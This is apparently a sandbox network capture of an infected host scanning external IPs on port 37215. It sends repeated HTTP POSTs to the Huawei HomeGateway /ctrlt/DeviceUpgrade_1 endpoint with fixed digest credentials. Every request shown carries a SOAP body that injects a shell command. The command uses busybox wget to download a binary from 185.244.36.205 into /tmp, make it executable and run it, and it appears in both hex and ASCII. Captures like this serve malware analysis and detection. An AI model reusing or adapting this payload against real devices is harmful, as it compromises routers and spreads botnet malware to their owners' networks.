                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2224192.168.2.155691641.54.43.13637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133327961 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2225192.168.2.1557932102.113.76.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133420944 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2226192.168.2.1536944197.17.210.12037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133708954 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2227192.168.2.1540560157.38.85.17437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133717060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2228192.168.2.1540886121.247.240.19337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133721113 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2229192.168.2.1537722102.56.79.19937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133934021 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2230192.168.2.155926694.203.123.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133935928 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2231192.168.2.1534894222.206.10.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.133939028 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2232192.168.2.1539474197.135.243.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134213924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2233192.168.2.1542158156.75.28.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134238005 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2234192.168.2.155553045.237.50.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:22.134291887 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
